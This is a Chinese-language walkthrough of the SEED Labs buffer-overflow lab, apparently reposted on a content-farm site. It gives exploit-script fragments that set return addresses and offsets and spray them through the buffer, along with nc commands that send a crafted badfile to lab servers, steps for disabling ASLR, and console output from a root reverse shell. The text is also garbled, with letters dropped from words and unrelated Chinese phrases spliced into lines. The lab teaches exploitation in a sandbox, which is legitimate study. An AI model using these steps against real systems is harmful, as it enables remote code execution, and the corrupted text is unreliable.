SEED(2)-缓冲区溢出攻击(Buffer-OverflowAttack)
1.漏洞原理
漏洞代码⽰例:
#include
voidfoo(char*str)
{
charbuffer[12];
strcpy(buffer,str);
}
intmain()
{
char*str="Thisisdefinitelylongerthan12";
foo(str);
return1;
}
当把str的内容copy到buffer中,由于str的长度⼤于12,就会造成缓冲区buffer的溢出,str中多出的部分会存放在缓冲区的上⽅,我们的
⽬的就是将代码植⼊到此处,然后让函数的returnAddress指向我们存放代码的地址A来执⾏code!
A:code的起始地址
Nop:指令为0x90,执⾏该指令时什么都不做,⼀直往下执⾏。(在code与foo()之间填满Nop,便于找到地址A,returnAddress⼀旦指
向其中⼀个Nop,就会执⾏到code的地址A)
2.实验准备
进⼊到/Buffer_Overflow/Labtup/rver-code路径下,执⾏:
$make
$makeinstall
$cd..#进⼊/Labtup⽬录
$dcbuild
$dcup
关闭防范机制:memoryrandomization
$ize_va_space=0
1Attack:GettheParameters(获取参数)
$echohello|nc10.9.0.59090
^C
若执⾏两次打印出的结果⼀致且输出地址为0xf零基础学吹笛子 fffxxxx,则说明memoryrandomization已关闭;
ContainerConsole
rver-1-10.9.0.5|Gotaconnectionfrom10.9.0.1
rver-1-10.9.0.5|Startingstack
rver-1-10.9.0.5|Inputsize:6
rver-1-10.9.0.5|FramePointer(ebp)insidebof():0xffffd108
rver-1-10.9.0.5|Buffer'saddressinsidebof():0xffffd098
rver-1-10.9.0.5|====ReturnedProperly====
rver-1-10.9.0.5|Gotaconnectionfrom10.9.0.1
rver-1-10.9.0.5|Startingstack
rver-1-10.9.0.5|Inputsize:6
rver-1-10.9.0.5|FramePointer(ebp)insidebof():0xffffd108
rver-1-10.9.0.5|Buffer'saddressinsidebof():0xffffd098
rver-1-10.9.0.5|====ReturnedProperly====
$cd/Buffer_Overflow/Files
$
然后利⽤ebp和Bufferaddress计算A的地址(ret)和offt:
ret(A)=0xffffd108+8(min(A)=ebp+8;max(A)=517-len(code))
offt=0xffffd108-0xffffd098+4=116(⼗进制)
修改中ret和offt的值并保退出;然后运⾏:
$
$catbadfile|nc10.9.0.59090
ContainerConsole
rver-1-10.9.0.5|Gotaconnectionfrom10.9.0.1
rver-1-10.9.0.5|Startingstack
rver-1-10.9.0.5|Inputsize:517
rver-1-10.9.0.5|FramePointer(ebp)insidebof():0xffffd428
rver-1-10.9.0.5|Buffer'saddressinsidebof():0xffffd3b8
rver-1-10.9.0.5|(^_^)SUCCESSSUCCESS(^_^)
若出现上⾯'(^_^)SUCCESSSUCCESS(^_^)',说明成功!
GetRevereShell
修改⽂件ret和A的值:
###Puttheshellcodeattheend
content[517-len(shellcode):]=shellcode
#Youneedtofindthecorrectaddress
#Thisshouldbethefirstinstructionyouwanttoreturnto
ret=0xffffd428+40
#Youneedtocalculatetheofft
offt=116
L=4#U4for32-bitaddressand8for64-bitaddress
content[offt:offt+L]=(ret).to_bytes(L,byteorder='little')
##新建⼀个命令⾏窗⼝输⼊$nc-lnv7070开启监听
在三国左慈 另外⼀个窗⼝向rver发送badfile⽂件
$
$catbadfile|nc10.9.0.59090
监听窗⼝输出以下内容,说明成功获取RevereShell;
Listeningon0.0.0.07070
Connectionreceivedon10.9.0.5拈花一笑 51582
root@ec5152748270:/bof
#2A右侧腹部隐痛 ttack:BufferSizeUnknown
$echohello|nc10.9.0.69090
^C
ContainerConsole
rver-2-10.9.0.6|Gotaconnectionfrom10.9.0.1
rver-2-10.9.0.6|Startingstack
rver-2-10.9.0.6|Inputsize:6
rver-2-10.9.0.6|Buffer'saddressinsidebof():0xffffd368
rver-2-10.9.0.6|====ReturnedProperly====
修改⽂件ret和S的值:
S:ref的个数=buffersize/4(⼀个ref为4字节)
ret:BufferAddress+buffersize
###Puttheshellcodeattheendofthebuffer
content[517-len(shellcode):]=shellcode
#Youneedtofindthecorrectaddress
#Thisshouldbethefirstinstructionyouwanttoreturnto
ret=0xffffd368+360
#SpraythebufferwithSnumberofreturnaddress
#YouneedtodecidetheSvalue
S=90
forofftinrange(S):
content[offt*4:offt*4+4]=(ret).to_bytes(4,byteorder='little')
##$
$catbadfile|nc10.9.0.69090
ContainerConsole
rver-2-10.9.0.6|Gotaconnectionfrom10.9.0.1
rver-2-10.9.0.6|Startingstack
rver-2-10.9.0.6|Inputsize:517
rver-2-10.9.0.6|Buffer'saddressinsidebof():0xffffd368
rver-2-10.9.0.6|(^_^)SUCCESSSUCCESS(^_^)
3Attack:64-bitServer
原理:
$echohello|nc10.9.0.79090
^C
ContainerConsole
rver-3-10.9.0.7|Gotaconnectionfrom10.9.0.1
rver-3-10.9.0.7|Startingstack
rver-3-10.9.0.7|Inputsize:517
rver-3-10.9.0.7|FramePointer(rbp)insidebof():0x00007fffffffe2d0
rver-3-10.9.0.7|Buffer'saddressinsidebof():0x00007fffffffe200
修改⽂件中的start,ret和offt;
start=40
offt=ebp-buffer+8
ret=[buffer,buffer+40]范围之间任选⼀个
$
$catbadfile|nc10.9.0.79090
ContainerConsole
rver-3-10.9.0.7|Gotaconnectionfrom10.9.0.1
rver-3-10.9.0.7|Startingstack
rver-3-10.9.0.7|Inputsize:517
rver-3-10.9.0.7|FramePointer(rbp)insidebof():0x00007fffffffe2d0
rver-3-10.9.0.7|Buffer'saddressinsidebof():0x00007fffffffe200
rver-3-10.9.0.7|(^_^)SUCCESSSUCCESS(^_^)
4Attack:Sm舒婷的代表作 allBuffer(64-bit)
$echohello|nc10.9.0.89090
^C
ContainerConsole
rver-4-10.9.0.8|Gotaconnectionfrom10.9.0老师的歌 .1
rver-4-10.9.0.8|Startingstack
rver-4-10.9.0.8|Inputsize:6
rver-4-10.9.0.8|FramePointer(rbp)insidebof():0x00007fffffffe2b0
rver-4-10.9.0.8|Buffer'saddressinsidebof():0x00007fffffffe250
rver-4-10.9.0.8|====ReturnedProperly====
修改⽂件
ret=rbp+1200
$
$catbadfile|nc10.9.0.89090
ContainerConsole
rver-4-10.9.0.8|Gotaconnectionfrom10.9.0.1
rver-4-10.9.0.8|Startingstack
rver-4-10.9.0.8|Inputsize:517
rver-4-10.9.0.8|FramePointer(rbp)insidebof():0x00007fffffffe2b0
rver-4-10.9.0.8|Buffer'saddressinsidebof():0x00007fffffffe250
rver-4-10.9.0.8|(^_^)SUCCESSSUCCESS(^_^)
开启防范机制
$ize_va_space=2
执⾏$nc-lnv7070开启监
Listeningon0.0.0.07070
修改exploit为revershell
新建⼀个命令⾏窗⼝:
$
$chmodu+
$./
我这⾥总共⽤时8分12秒:
8minutesand12condlapd.
Theprogramhasbeenrunning27296timessofar.
8minutesand12condlapd.
Theprogramhasbeenrunning27297timessofar.
成功后监听窗⼝会返回shell
Connectionreceivedon10.9.0.551372
root@ec5152748270:/bof#
本文发布于:2023-03-27 10:31:18,感谢您对本站的认可!
本文链接:https://www.wtabcd.cn/zhishi/a/1679884278154989.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文word下载地址:溢出攻击.doc
本文 PDF 下载地址:溢出攻击.pdf
留言与评论(共有 0 条评论) |